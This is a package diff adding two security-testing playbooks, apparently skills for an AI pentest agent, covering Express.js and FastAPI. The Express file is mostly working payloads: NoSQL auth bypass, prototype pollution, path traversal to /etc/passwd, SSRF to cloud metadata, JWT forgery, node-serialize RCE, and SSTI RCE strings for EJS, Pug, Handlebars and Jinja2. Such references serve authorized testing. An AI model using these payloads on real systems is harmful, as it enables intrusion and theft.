@aegis-scan/skills 0.5.0 → 0.5.1

package/skills/offensive/airecon-fork/frameworks-express/SKILL.md

@@ -0,0 +1,266 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: express
+description: Security testing playbook for Express.js/Node.js applications covering prototype pollution, SSRF, regex DoS, JWT misuse, path traversal, and Node.js-specific misconfigurations
+---
+
+# Express.js / Node.js Security Testing
+
+Express is the most popular Node.js web framework. Attack surface: prototype pollution, path traversal via `__proto__`, JWT misconfigurations, NoSQL injection (MongoDB), SSRF, regex DoS (ReDoS), and common npm package vulnerabilities.
+
+---
+
+## Reconnaissance
+
+### Fingerprinting Express/Node.js
+
+    # Express-specific headers and responses
+    X-Powered-By: Express          # Default header (often left enabled)
+    ETag: W/"..."                  # Weak ETag = Express default
+
+    # Common Node.js paths
+    GET /health                    # Health check
+    GET /status
+    GET /ping
+    GET /metrics                   # Prometheus (if prom-client used)
+    GET /api-docs                  # Swagger UI
+    GET /swagger.json
+    GET /openapi.json
+    GET /.well-known/              # OIDC discovery, security.txt
+
+    # Node.js error page
+    GET /nonexistent → "Cannot GET /nonexistent" → confirms Express
+
+    # Package.json / config exposure
+    GET /package.json              # Node packages + version info
+    GET /package-lock.json
+    GET /.env
+    GET /config.js
+    GET /config.json
+
+---
+
+## Prototype Pollution
+
+Node.js/Express apps using `merge`, `extend`, `lodash.merge`, or JSON path setting are vulnerable:
+
+    # Test: inject __proto__ or constructor.prototype into JSON body
+    POST /api/endpoint
+    Content-Type: application/json
+    {"__proto__": {"admin": true}}
+
+    {"constructor": {"prototype": {"admin": true}}}
+
+    # URL parameter pollution
+    GET /api/user?__proto__[admin]=true
+    GET /api/user?constructor[prototype][admin]=true
+
+    # Nested merge vulnerability
+    POST /api/settings
+    {"settings": {"__proto__": {"polluted": "yes"}}}
+
+    # Validation: after sending, check if app-wide default has changed:
+    GET /api/any-endpoint  → check if "admin": true appears in response
+
+    # Libraries vulnerable to prototype pollution:
+    # lodash < 4.17.11 (_.merge, _.mergeWith, _.defaultsDeep)
+    # jquery < 3.4.0 ($.extend)
+    # hoek < 4.2.1 / < 5.0.3
+
+---
+
+## NoSQL Injection (MongoDB / Mongoose)
+
+    # MongoDB operator injection in JSON body:
+    POST /api/login
+    Content-Type: application/json
+    {"username": {"$gt": ""}, "password": {"$gt": ""}}    # Bypass auth
+
+    # Ne (not equal) operator:
+    {"username": "admin", "password": {"$ne": "wrong"}}
+
+    # Regex matching all users:
+    {"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
+
+    # In array bypass:
+    {"username": {"$in": ["admin", "user"]}, "password": {"$gt": ""}}
+
+    # URL-encoded (query string injection):
+    GET /api/users?username[$gt]=&password[$gt]=
+
+    # Enumeration via $regex:
+    {"username": "admin", "password": {"$regex": "^a"}}    # Binary search on password
+
+---
+
+## Path Traversal
+
+    # Express static file serving — test path traversal
+    GET /static/../.env
+    GET /static/../../config.js
+    GET /public/../../../etc/passwd
+
+    # URL-encoded:
+    GET /files/..%2F..%2Fetc%2Fpasswd
+    GET /files/%2e%2e%2f%2e%2e%2fetc%2fpasswd
+
+    # Double encoding:
+    GET /files/..%252F..%252Fetc%252Fpasswd
+
+    # Null byte (older Node.js versions):
+    GET /files/../../etc/passwd%00.png
+
+---
+
+## SSRF
+
+    # Node.js HTTP libraries (axios, node-fetch, got, request):
+    # Test any URL-accepting parameter
+
+    # Probe internal services:
+    http://localhost:3000/internal
+    http://127.0.0.1/admin
+    http://169.254.169.254/latest/meta-data/   # AWS IMDS
+    http://metadata.google.internal/           # GCP metadata
+    http://0.0.0.0/                            # All interfaces
+
+    # Protocol handlers in Node.js:
+    file:///etc/passwd
+    dict://localhost:6379/info                  # Redis
+    gopher://localhost:6379/...                 # Redis commands via gopher
+
+    # DNS rebinding via custom domain:
+    http://attacker-rebinding.domain/
+
+---
+
+## JWT Misconfigurations
+
+    # Algorithm confusion: none algorithm
+    # Forge JWT with algorithm=none:
+    {"alg": "none", "typ": "JWT"}.{"sub": "1", "role": "admin"}.
+
+    # RS256 → HS256 confusion:
+    # Sign JWT with server's public key as HMAC secret
+    # Works when server uses jsonwebtoken with algorithm not pinned
+
+    # Key ID (kid) injection:
+    # JWT header: {"alg": "HS256", "kid": "../../etc/passwd"}
+    # Server reads key from file path = LFI via JWT
+
+    # Weak secret brute force:
+    hashcat -a 0 -m 16500 <jwt_token> /usr/share/wordlists/rockyou.txt
+    python3 -c "import jwt; print(jwt.decode('<token>', 'secret', algorithms=['HS256']))"
+
+    # Missing expiry check:
+    # Use old expired JWT — check if server still accepts it
+
+---
+
+## ReDoS (Regex Denial of Service)
+
+    # Catastrophic backtracking in vulnerable regex patterns
+    # Find: email validation, username validation, URL parsing
+
+    # Classic ReDoS payload (for patterns like /(a+)+$/ ):
+    "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"
+    "aaaaaaaaaaaaaaaaaaaaaaaaaaa@"
+
+    # Email validation ReDoS:
+    "aaaaaaaaaaaaaaaaaaaaaaaaaaaa@aaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+
+    # Test: send payload and measure response time
+    time curl -X POST <target>/api/register -d '{"email": "aaaa[...]@aaaa[...].com"}'
+
+---
+
+## Deserialization (node-serialize)
+
+    # node-serialize npm package (vulnerable)
+    # Payload uses IIFE notation:
+    {"rce": "_$$ND_FUNC$$_function(){require('child_process').exec('id', function(err, stdout){console.log(stdout)})}()"}
+
+    # Base64-encode and set as cookie if node-serialize is used on cookies
+    # Detect: cookie value starts with base64 of JSON with _$$ND_FUNC$$_
+
+---
+
+## Server-Side Template Injection
+
+    # Express commonly uses: EJS, Pug (Jade), Handlebars, Nunjucks, Mustache
+
+    # EJS SSTI:
+    <%= 7*7 %>                              # Basic arithmetic
+    <%= process.env %>                      # Dump environment
+    <%- global.process.mainModule.require('child_process').execSync('id') %>  # RCE
+
+    # Pug SSTI:
+    #{7*7}                                  # Basic
+    #{root.process.mainModule.require('child_process').execSync('id').toString()}
+
+    # Handlebars SSTI:
+    {{#with "s" as |string|}}
+      {{#with "e"}}
+        {{#with split as |conslist|}}
+          {{this.pop}}
+          {{this.push (lookup string.sub "constructor")}}
+          {{this.pop}}
+          {{#with string.split as |codelist|}}
+            {{this.pop}}
+            {{this.push "return require('child_process').execSync('id');"}}
+            {{this.pop}}
+            {{#each conslist}}
+              {{#with (string.sub.apply 0 codelist)}}
+                {{this}}
+              {{/with}}
+            {{/each}}
+          {{/with}}
+        {{/with}}
+      {{/with}}
+    {{/with}}
+
+---
+
+## Security Headers Analysis
+
+    # Check security headers (often missing in Express apps)
+    curl -I <target> | grep -iE "x-frame-options|content-security-policy|x-content-type|strict-transport|referrer-policy|permissions-policy"
+
+    # Express common misconfigurations:
+    # - Missing helmet.js (no security headers)
+    # - cors({ origin: '*' }) — open CORS
+    # - X-Powered-By: Express not removed
+
+---
+
+## Common Vulnerabilities by Package
+
+| Package | Vulnerability |
+|---------|--------------|
+| `lodash < 4.17.21` | Prototype pollution |
+| `express-fileupload` | Prototype pollution via files |
+| `jsonwebtoken < 9.0` | Algorithm confusion |
+| `node-serialize` | Deserialization RCE |
+| `multer` | Path traversal in filename |
+| `express-validator` | ReDoS in certain checks |
+| `passport-jwt` | Missing algorithm pin |
+
+    # Check npm packages:
+    npm audit    # If access to package.json + node_modules
+
+---
+
+## Pro Tips
+
+1. `X-Powered-By: Express` header confirms framework — always test prototype pollution first
+2. NoSQL injection via `{"$gt": ""}` bypasses auth in >50% of Express+MongoDB apps
+3. Prototype pollution often enables privilege escalation — `{"__proto__": {"admin": true}}`
+4. JWT `algorithm: none` works surprisingly often in Express apps using old jsonwebtoken
+5. Path traversal in Express static middleware with symlinks or encoded slashes
+6. `cors({ origin: '*' })` + cookie-based auth = CSRF-equivalent credential theft
+7. `package.json` exposure reveals exact package versions → targeted CVE search
+
+## Summary
+
+Express testing = prototype pollution (JSON body __proto__) + NoSQL injection ($gt operator) + JWT algorithm confusion + SSRF on URL parameters + SSTI if templates used. Prototype pollution is the most Express-specific finding — test every JSON-accepting endpoint with `{"__proto__": {"admin": true}}`. NoSQL injection in MongoDB is the other must-test: `{"password": {"$gt": ""}}` bypasses auth in unparameterized queries.

package/skills/offensive/airecon-fork/frameworks-fastapi/SKILL.md

@@ -0,0 +1,193 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: fastapi
+description: Security testing playbook for FastAPI applications covering ASGI, dependency injection, and API vulnerabilities
+---
+
+# FastAPI
+
+Security testing for FastAPI/Starlette applications. Focus on dependency injection flaws, middleware gaps, and authorization drift across routers and channels.
+
+## Attack Surface
+
+**Core Components**
+- ASGI middlewares: CORS, TrustedHost, ProxyHeaders, Session, exception handlers, lifespan events
+- Routers and sub-apps: APIRouter prefixes/tags, mounted apps (StaticFiles, admin), `include_router`, versioned paths
+- Dependency injection: `Depends`, `Security`, `OAuth2PasswordBearer`, `HTTPBearer`, scopes
+
+**Data Handling**
+- Pydantic models: v1/v2, unions/Annotated, custom validators, extra fields policy, coercion
+- File operations: UploadFile, File, FileResponse, StaticFiles mounts
+- Templates: Jinja2Templates rendering
+
+**Channels**
+- HTTP (sync/async), WebSocket, SSE/StreamingResponse
+- BackgroundTasks and task queues
+
+**Deployment**
+- Uvicorn/Gunicorn, reverse proxies/CDN, TLS termination, header trust
+
+## High-Value Targets
+
+- `/openapi.json`, `/docs`, `/redoc` in production (full attack surface map, securitySchemes, server URLs)
+- Auth flows: token endpoints, session/cookie bridges, OAuth device/PKCE
+- Admin/staff routers, feature-flagged routes, `include_in_schema=False` endpoints
+- File upload/download, import/export/report endpoints, signed URL generators
+- WebSocket endpoints (notifications, admin channels, commands)
+- Background job endpoints (`/jobs/{id}`, `/tasks/{id}/result`)
+- Mounted subapps (admin UI, storage browsers, metrics/health)
+
+## Reconnaissance
+
+**OpenAPI Mining**
+```
+GET /openapi.json
+GET /docs
+GET /redoc
+GET /api/openapi.json
+GET /internal/openapi.json
+```
+
+Extract: paths, parameters, securitySchemes, scopes, servers. Endpoints with `include_in_schema=False` won't appear—fuzz based on discovered prefixes and common admin/debug names.
+
+**Dependency Mapping**
+
+For each route, identify:
+- Router-level dependencies (applied to all routes)
+- Route-level dependencies (per endpoint)
+- Which dependencies enforce auth vs just parse input
+
+## Key Vulnerabilities
+
+### Authentication & Authorization
+
+**Dependency Injection Gaps**
+- Routes missing security dependencies present on other routes
+- `Depends` used instead of `Security` (ignores scope enforcement)
+- Token presence treated as authentication without signature verification
+- `OAuth2PasswordBearer` only yields a token string—verify routes don't treat presence as auth
+
+**JWT Misuse**
+- Decode without verify: test unsigned tokens, attacker-signed tokens
+- Algorithm confusion: HS256/RS256 cross-use if not pinned
+- `kid` header injection for custom key lookup paths
+- Missing issuer/audience validation, cross-service token reuse
+
+**Session Weaknesses**
+- SessionMiddleware with weak `secret_key`
+- Session fixation via predictable signing
+- Cookie-based auth without CSRF protection
+
+**OAuth/OIDC**
+- Device/PKCE flows: verify strict PKCE S256 and state/nonce enforcement
+
+### Access Control
+
+**IDOR via Dependencies**
+- Object IDs in path/query not validated against caller
+- Tenant headers trusted without binding to authenticated user
+- BackgroundTasks acting on IDs without re-validating ownership at execution time
+- Export/import pipelines with IDOR and cross-tenant leaks
+
+**Scope Bypass**
+- Minimal scope satisfaction (any valid token accepted)
+- Router vs route scope enforcement inconsistency
+
+### Input Handling
+
+**Pydantic Exploitation**
+- Type coercion: strings to ints/bools, empty strings to None, truthiness edge cases
+- Extra fields: `extra = "allow"` permits injecting control fields (role, ownerId, scope)
+- Union types and `Annotated`: craft shapes hitting unintended validation branches
+
+**Content-Type Switching**
+```
+application/json ↔ application/x-www-form-urlencoded ↔ multipart/form-data
+```
+Different content types hit different validators or code paths (parser differentials).
+
+**Parameter Manipulation**
+- Case variations in header/cookie names
+- Duplicate parameters exploiting DI precedence
+- Method override via `X-HTTP-Method-Override` (upstream respects, app doesn't)
+
+### CORS & CSRF
+
+**CORS Misconfiguration**
+- Overly broad `allow_origin_regex`
+- Origin reflection without validation
+- Credentialed requests with permissive origins
+- Verify preflight vs actual request deltas
+
+**CSRF Exposure**
+- No built-in CSRF in FastAPI/Starlette
+- Cookie-based auth without origin validation
+- Missing SameSite attribute
+
+### Proxy & Host Trust
+
+**Header Spoofing**
+- ProxyHeadersMiddleware without network boundary: spoof `X-Forwarded-For/Proto` to influence auth/IP gating
+- Absent TrustedHostMiddleware: Host header poisoning in password reset links, absolute URL generation
+- Cache key confusion: missing Vary on Authorization/Cookie/Tenant
+
+### Server-Side Vulnerabilities
+
+**Template Injection (Jinja2)**
+```python
+{{7*7}}  # Arithmetic confirmation
+{{cycler.__init__.__globals__['os'].popen('id').read()}}  # RCE
+```
+Check autoescape settings and custom filters/globals.
+
+**SSRF**
+- User-supplied URLs in imports, previews, webhooks validation
+- Test: loopback, RFC1918, IPv6, redirects, DNS rebinding, header control
+- Library behavior (httpx/requests): redirect policy, header forwarding, protocol support
+- Protocol smuggling: `file://`, `ftp://`, gopher-like shims if custom clients
+
+**File Upload**
+- Path traversal in `UploadFile.filename` with control characters
+- Missing storage root enforcement, symlink following
+- Vary filename encodings, dot segments, NUL-like bytes
+- Verify storage paths and served URLs
+
+### WebSocket Security
+
+- Missing per-connection authentication
+- Cross-origin WebSocket without origin validation
+- Topic/channel IDOR (subscribing to other users' channels)
+- Authorization only at handshake, not per-message
+
+### Mounted Apps
+
+Sub-apps at `/admin`, `/static`, `/metrics` may bypass global middlewares. Verify auth enforcement parity across all mounts.
+
+### Alternative Stacks
+
+- If GraphQL (Strawberry/Graphene) is mounted: validate resolver-level authorization, IDOR on node/global IDs
+- If SQLModel/SQLAlchemy present: probe for raw query usage and row-level authorization gaps
+
+## Bypass Techniques
+
+- Content-type switching to traverse alternate validators
+- Parameter duplication and case variants exploiting DI precedence
+- Method confusion via proxies (`X-HTTP-Method-Override`)
+- Race windows around dependency-validated state transitions (issue token then mutate with parallel requests)
+
+## Testing Methodology
+
+1. **Enumerate** - Fetch OpenAPI, diff with 404-fuzzing for hidden endpoints
+2. **Matrix testing** - Test each route across: unauth/user/admin × HTTP/WebSocket × JSON/form/multipart
+3. **Dependency analysis** - Map which dependencies enforce auth vs parse input
+4. **Cross-environment** - Compare dev/stage/prod for middleware and docs exposure differences
+5. **Channel consistency** - Verify same authorization on HTTP and WebSocket for equivalent operations
+
+## Validation Requirements
+
+- Side-by-side requests showing unauthorized access (owner vs non-owner, cross-tenant)
+- Cross-channel proof (HTTP and WebSocket for same rule)
+- Header/proxy manipulation showing altered outcomes (Host/XFF/CORS)
+- Minimal payloads for template injection, SSRF, token misuse with safe/OAST oracles
+- Document exact dependency paths (router-level, route-level) that missed enforcement